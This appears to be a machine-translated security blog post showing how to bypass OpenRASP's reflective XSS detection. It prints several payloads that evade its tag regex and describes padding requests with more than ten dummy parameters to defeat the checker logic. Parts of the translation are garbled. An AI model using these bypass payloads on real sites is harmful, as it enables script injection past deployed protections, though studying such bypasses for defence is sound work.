By default, OpenRASP detects only reflective XSS, and only IAST commercial supports storage XSS. For reflective XSS, OpenRasp can only detect controllable output points outside the HTML tag, which is what this article bypasses. or Internally, OpenRasp is barely detectable.

 

The test environment

【 Network Security learning materials 】

Windows/tomcat/jdk1.8 / OpenRasp 1.3.7-beta

Test environment deployment see www.anquanke.com/post/id/241… , or the official website documentation.

In official.js, the xss_userInput algorithm is set to ignore by default and changed to block to enable interception. Click the following link in the official test case to trigger OpenRasp interception.

 

Openrasp XSS algorithm

There are two openRasp XSS algorithms. Algorithm 1 is for the PHP environment and will not be considered here. Algorithm 2 is the user input matching algorithm. According to the annotation, the principle of the algorithm is “when the user input is longer than 15, it matches the tag re and appears in the response, directly intercepts”.

The meaning of the tag re is resolved using the Regexper website as follows

Tag re generally matches two situations where the request parameter value has a substring to
or 0x00-0x20 characters. So the following common XSS test payloads are intercepted.

<img SRC =1 onError =alert()> Spaces correspond to the re 0x20 < SVG /onload=alert()> // "< SVG /" part of the match reCopy the code

Triggers interception

 

Tag regular bypass

【 Network Security learning materials 】

Some XSS bypass payloads on the network, and found that the following can bypass the tag re

<d3v/onmouseleave=[1].some(confirm)>click
<d3/onmouseenter=[2].find(confirm)>z
<d3"<"/onclick="1>[confirm``]"<">z
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
Copy the code

If the browser directly enters the XSS payload, the response will be 400. Url encoding all characters for payload.

Right-click “Copy URL” in burpSuite Repeater, copy the URL to the browser to access, and click to trigger the pop-up box.

The label is followed by single and double quotation marks

【 Network Security learning materials 】

The following two XSS payloads can also be bypassed during the collection process.

<a"/onclick=(confirm)()>click 
<a'/onclick=(confirm)()>click
Copy the code

A simple test of other tags followed by single or double quotes to bypass, seems to be a lot of all.

< span style = "box-sizing: border-box; color: RGB (74, 74, 74); font-size: 13px! Important; word-break: break-word! Important;" < span style = "box-sizing: border-box; color: RGB (74, 74, 74); font-size: 13px! Important; word-break: break-word! Important;" Onclick =alert()>12</divCopy the code

For example, use 123

123.
‘>

Constructing invalid tags

【 Network Security learning materials 】

This can also be used to bypass OpenRASp. Seeing this way around, the front of the feeling is not fragrant.

Payload

<abc1 onclick=confirm()>click hereCopy the code

Verify the following

or

<abcdefabcdefa onclick=confirm()>click here // Tag name length greater than 12Copy the code

Program logic bypass

【 Network Security learning materials 】

There is also a bypass method, from the program detection logic to bypass.

Openrasp XSS the concrete testing code in this file for agent/Java/engine/SRC/main/Java/com/baidu/openrasp/plugins/checker/local/XssChecker. Java. The following code is an implementation of “intercepting user input that is longer than 15, matches the tag re, and appears in the response.”

But there’s an extra bit of logic in the code. If the request passes multiple parameters, when a parameter value is longer than 15 and matches the previous tag regular
], if the corresponding parameter value didn’t appear in the response, the variable count value will add 1. When the count value is more than 10, Openrasp will release it directly. The control program will be bypassed by running into the second box in the picture above.

Bypass the demo

【 Network Security learning materials 】

In this case, a POST request is used to view the payload. If it is converted to a GET request and the parameter value is URL encoded, the effect is the same.

The original request triggers interception

Bypass the payload. Multiple input[n] parameters are added before the input parameter, and the parameter value is other XSS payload.

Convert it to a GET request and encode the payload.

Bypass payload analysis

【 Network Security learning materials 】

A constructed bypass payload has several requirements. First, the fictional request parameters should theoretically have at least 11, such as the previous input0 to Input11 request parameters. If that doesn’t work, it’s a good idea to add a few more request parameters. Second, the fictitious request parameter value has some requirements. Third, the fictitious request parameter value cannot be the same as the real request parameter value.

In this case, request parameters from Input0 to Input11 are listed before input parameters in parameterMap, as shown in the following figure.

In this case, the input0 to Input11 parameters will be processed by the OpenRASp check logic first, thus bypasing the condition that hit count > exceedLengthCount.

 

Those who want to learn network security, get on board.